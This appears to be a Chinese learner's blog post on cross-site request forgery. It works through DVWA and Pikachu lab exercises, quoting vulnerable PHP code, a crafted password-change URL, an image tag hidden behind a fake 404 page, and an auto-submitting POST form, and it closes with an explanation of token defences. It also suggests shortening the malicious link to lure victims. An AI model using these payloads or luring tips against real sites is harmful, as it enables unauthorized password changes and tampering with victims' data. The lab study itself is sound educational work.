CSRF
CSRFf全称为:Cross-site request forgery
CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。
CSRF的攻击原理
流程:
步骤一:
用户user登录浏览正规浏览器A,浏览器A通过用户的验证,并且在用户中产生cookie。
步骤二
恶意浏览器B通过各种方式,在浏览器A中放入链接,使用户user访问恶意网站B。
步骤三
用户user访问浏览器B后,浏览器B就会拿到user的cookie,并访问浏览器A,发出操作请求。
步骤四
浏览器A无法识别操作请求是user发出还是浏览器B发出,因此,浏览器A会响应浏览器B的请求。这样,就达到了模拟用户的目的。
个人理解:CSRF没有拿到用户权限,而是直接通过用户权限完成攻击。这点与·XSS不同,XSS是拿到用户权限,进行攻击。
使用DVWA 进行试验
low等级
查看源码
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
可以明白只进行了$pass_new == $pass_conf判断,还有一个防sql注入函数的过滤,没有进行任何的验证(大佬写的,我搬运一手,属是看不明白)
首先更改密码,然后用burp抓包
构造payload
http://192.168.147.1/DVWA-master/vulnerabilities/csrf/?password_new=3333&password_conf=3333&Change=Change
然后
新建一个html文件
<img src="http://192.168.147.1/DVWA-master/vulnerabilities/csrf/?password_new=3333&password_conf=3333&Change=Change"/>
<h1>404<h1>
<h2>file not found.<h2>
点开后,就能够发现自己的密码被更改(但是我的没有被改,不知道为什么)
当然,那么长的网址,有点呆,那么就需要在网上找一个短网址的转换器,把长的网址转换为短网址,然后可任意简单的做一个HTML让受害人直接点进去,即可。
或者,直接
生成csrf,在代理浏览器上也可以
不知道为什么,我在代理浏览器上直接登录就行,复制HTML在别的浏览器就不行,离谱。
Medium等级
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
可以看出,和low等级的代码多了个判断
$_SERVER中HTTP_REFERER有SERVER_NAME的值时候,则进行修改密码操作。
(抄的大佬的…)
$_SERVER['HTTP_REFERER'] #链接到当前页面的前一页面的 URL 地址。
$_SERVER['SERVER_NAME'] #当前运行脚本所在服务器主机的名称。
因此,只需要将.html文件修改为dvwa.com.html即可。
以上都为get的类型
也没有实战演练,等到学习到实战的时候,在来写一波。
CSRF再学习之pikaqiu靶场
get型
首先使用pikaqiu提供的用户登录
密码是123456
修改个人信息
修改,并且使用burp抓包
生成CSRF
用浏览器测试,点击下图按钮,就会被更改个人信息
post型
如果是post型,那么所有请求在表单上提交。
可以自己搭建一个站点,在站点上做一个表单,诱导lucy点击这个链接,当用户点击时,就会自动向存在CSRF的服务器提交POST请求修改个人信息
我原来是
这样的,在本地写一个html表单
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title> csrf</title>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
<input id="sex" type="text" name="sex" value="girl" />
<input id="phonenum" type="text" name="phonenum" value="12345678922" />
<input id="add" type="text" name="add" value="hacker" />
<input id="email" type="text" name="email" value="lucy@pikachu.com" />
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
点开就能发现信息被更改了
不知道怎么回事,我的是显示不出来,而且会跳转到一个不存在的页面。
…问题不知道在哪
Token
用burp抓包,可以发现多了个token
token:随机码,每次请求,都增加一个随机码,后台每次对这个随机码进行验证
对比上图,每次的token都会改变
并且,token每次提交后都会失效,所以当攻击者拿到user的token时,此token已经失效。
所以CSRF的防御也就成功了。